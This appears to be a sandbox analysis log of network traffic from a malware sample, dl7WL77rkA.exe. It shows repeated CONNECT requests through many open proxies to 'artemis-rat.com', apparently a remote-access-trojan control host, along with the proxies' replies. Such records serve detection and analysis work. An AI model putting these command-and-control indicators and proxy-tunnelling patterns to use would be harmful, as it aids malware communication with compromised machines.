Mar 11, 2024 03:30:50.852313995 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:56.921468973 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1494192.168.2.55412043.134.237.2164433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.684083939 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1495192.168.2.55412243.134.237.2164433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.687072039 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1496192.168.2.553530197.157.254.16241453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.691184044 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1497192.168.2.55403558.221.193.7488883876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.692876101 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.009315968 CET | 348 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                            Server: MyWebServer/3.6.20 Unicode (By TGY)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; Charset=GB2312
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1><hr><h3>MyWebServer/3.6.20 Unicode (By TGY)</h3></center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1498192.168.2.55404920.37.207.880803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.693738937 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.920250893 CET | 72 | IN | HTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Proxy-Agent: Fortinet-Proxy/1.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1499192.168.2.554025167.172.86.46104713876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.700043917 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1500192.168.2.552601177.231.245.18280803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.780405998 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.905128956 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.997680902 CET19INHTTP/1.1 200 OK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1501192.168.2.554054101.133.162.2388993876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.780848026 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.110888004 CET | 767 | IN | HTTP/1.1 403 Forbidden
Server: Beaver
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 635
Connection: close
Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1502192.168.2.55407279.110.202.13180813876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.784907103 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1503192.168.2.55408243.129.228.4678913876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.785907030 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1504192.168.2.553558185.49.30.580813876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.785907030 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1505192.168.2.55408820.111.54.16803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.786412954 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.079171896 CET | 319 | IN | HTTP/1.1 403 Forbidden
Server: squid
Mime-Version: 1.0
Date: Mon, 11 Mar 2024 02:30:44 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 17
X-Squid-Error: ERR_ACCESS_DENIED 0
X-Cache: MISS from cdn-fintech.info
X-Cache-Lookup: NONE from cdn-fintech.info:8123
Connection: keep-alive
Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
Data Ascii: ERR_ACCESS_DENIED


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1506192.168.2.554103104.17.248.164803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.786811113 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.941844940 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:44 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1507192.168.2.554106173.245.49.27803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.789776087 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.944200993 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:44 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1508192.168.2.55265346.226.148.10593523876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.790381908 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1517192.168.2.549978165.227.196.37537183876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.818773031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.905210972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.998819113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.092715979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1518192.168.2.554184200.111.182.64433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.819142103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1519192.168.2.554185200.111.182.64433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.824501991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1520192.168.2.55409182.165.105.48803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.824800968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:09.926081896 CET705INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:09 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            Content-Length: 529
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at info@newvoice.ch to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:10.588279963 CET705INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:09 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            Content-Length: 529
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at info@newvoice.ch to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:11.540992975 CET705INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:09 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            Content-Length: 529
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at info@newvoice.ch to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:13.369271994 CET705INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:09 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            Content-Length: 529
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at info@newvoice.ch to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:17.025649071 CET536INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:09 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            Content-Length: 529
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at info@newvoice.ch to inform them of the time this erro
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:20.681304932 CET536INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:09 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            Content-Length: 529
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at info@newvoice.ch to inform them of the time this erro
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:24.337564945 CET705INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:09 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            Content-Length: 529
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at info@newvoice.ch to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1521192.168.2.554186200.111.182.64433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.827052116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1522192.168.2.554187200.111.182.64433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.830065012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1523192.168.2.553686168.126.74.132803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.854548931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:20.562784910 CET60INHTTP/1.0 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: Apache
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:21.427655935 CET60INHTTP/1.0 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: Apache
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:22.387366056 CET60INHTTP/1.0 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: Apache
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:24.243488073 CET60INHTTP/1.0 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: Apache
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:27.955363989 CET60INHTTP/1.0 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: Apache
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:35.507469893 CET60INHTTP/1.0 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: Apache
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:50.355456114 CET60INHTTP/1.0 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: Apache


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1524192.168.2.554129172.67.25.204803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.855458021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.010020018 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1525192.168.2.550082104.238.111.107263053876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.863953114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.905006886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.989506006 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:57.036731005 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1526 | 192.168.2.5 | 53802 | 132.148.128.88 | 29313 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.870871067 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
